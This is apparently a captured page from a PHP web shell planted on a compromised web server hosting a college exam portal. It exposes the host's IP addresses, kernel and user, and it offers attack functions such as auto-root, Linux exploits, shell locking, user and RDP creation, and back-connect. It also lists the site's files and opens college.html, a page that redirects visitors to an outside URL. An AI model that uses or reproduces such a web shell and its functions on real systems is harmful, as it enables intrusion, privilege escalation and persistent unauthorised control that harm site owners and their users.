Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.227.183.161
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
website /
gaccta /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
picture_library
[ DIR ]
drwxr-xr-x
plesk-stat
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
aboutus.html
9.91
KB
-rwxr-xr-x
college.html
4.19
KB
-rwxr-xr-x
contacts.html
5.49
KB
-rwxr-xr-x
courses.html
11.54
KB
-rwxr-xr-x
exambr.html
5.34
KB
-rwxr-xr-x
favicon.ico
1.12
KB
-rwxr-xr-x
guest.html
17.77
KB
-rwxr-xr-x
index.html
8.66
KB
-rwxr-xr-x
index.php
282.81
KB
-rwxr-xr-x
mcverify.php
167
B
-rwxr-xr-x
studentsup.html
7.64
KB
-rwxr-xr-x
support.html
9.69
KB
-rwxr-xr-x
teaching.html
76.63
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : college.html
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8" /> <title>Parikshamitra</title> <link rel="shortcut icon" type="image/x-icon" href="../images/favicon.jpg" /> <link rel="stylesheet" href="css/style.css" type="text/css" media="all" /> <link rel="stylesheet" href="css/logstyle.css" type="text/css" media="all" /> <!-- Bootstrap Core CSS --> <link href="css/bootstrap.css" rel='stylesheet' type='text/css' /> <link href="css/animate.css" rel="stylesheet" type="text/css" media="all"> <script src="js/home.js" type="text/javascript"></script> <script src="js/jquery-1.7.2.min.js" type="text/javascript"></script> <script src="js/index.js" type="text/javascript"></script> <script src="js/control.js" type="text/javascript"></script> <script src="js/dytable.js" type="text/javascript"></script> <script src="js/validate.js" type="text/javascript"></script> <script src="js/form_submit.js" type="text/javascript"></script> <script src="js/loadtable.js" type="text/javascript"></script> <script src="js/cms.js" type="text/javascript"></script> <script> $(document).ready(function(){ var redurl = "http://www.logisys.net.in/kus"; window.location.href = redurl; }); </script> </head> <body> <!-- wrapper --> <div id="wrapper"> <!-- shell --> <div class="shell"> <!-- container --> <div class="container"> <div style="margin-right:10px;padding-top:8px;color:#fff;" class="nav-top"> <span style="padding-left:5px;width:400px;" id="datestr"></span> <span style="float:right;padding-right:10px;"> <span id="user_name"></span> <span onclick="window.location.href='index.html'">Home</span> </span> </div <!-- header --> <header class="header"> <h1 id="logo"><a href="#">Logisys</a></h1> <br style="clear:both;"/> <nav id="navigation"> <ul> <li class="active"><a href="index.html">Home</a></li> <li><a href="aboutus.html">About Us</a></li> <li><a href="#">Students Corner</a> <ul> <li><a href="results.html">Results</a></li> <li><a href="exam.html">Examination Application Form </a></li> <li><a href="student.html">Online Services </a></li> <li><a href="degreecert.html">Degree Certificate</a></li> </ul> </li> <li><a href="#" onclick="redirectCollegepage()">College Login</a></li> <li><a href="teachers.html">Teachers Corner</a></li> <li><a href="contacts.html">Contact Us</a></li> </ul> </nav> <div class="cl"> </div> </header> <!-- end of header --> <div class="main"> <div> <div id="v-nav" style="padding-top:5px;"> <div class="tab-notify" style="display:block;" > <h4><b>Notifications</b></h4> </div> <div class="tab-content" style="display:block"> <h4><b>College Login</b></h4> <div class="tab-content-body"> <div class="row mb40" style="margin-top:20px;float:left;width:450px;padding-left:30px;margin-right:20px;"> <div id="cont_acpt_univ" style="display:block;"> <button type="submit" class="button button2" style="width:350px;" onclick="window.location.href='http://www.logisys.net.in/kus'"><span>Regular</span></button> <button type="submit" class="button button2" style="width:350px;" onclick="window.location.href='http://www.logisys.net.in/kus'"><span>Distance Education</span></button> <button type="submit" class="button button2" style="width:350px;" onclick="window.location.href='http://www.logisys.net.in/kus'"><span>Distance Education (Semester Scheme)</span></button> </div> <div id="cont_curr_univ" style="display:none;"> </div> </div> </div> </div> <!-- end of box --> </div> <!-- end of main --> <section style="background: url(images/appfromHd.jpg) repeat 0 0;"></section> </div> <!-- end of container --> </div> <!-- end of shell --> </div> <!-- end of wrappert --> <script src="js/script.js"></script> <script type="text/javascript" src="js/bootstrap.min.js"></script> </body> </html>
Close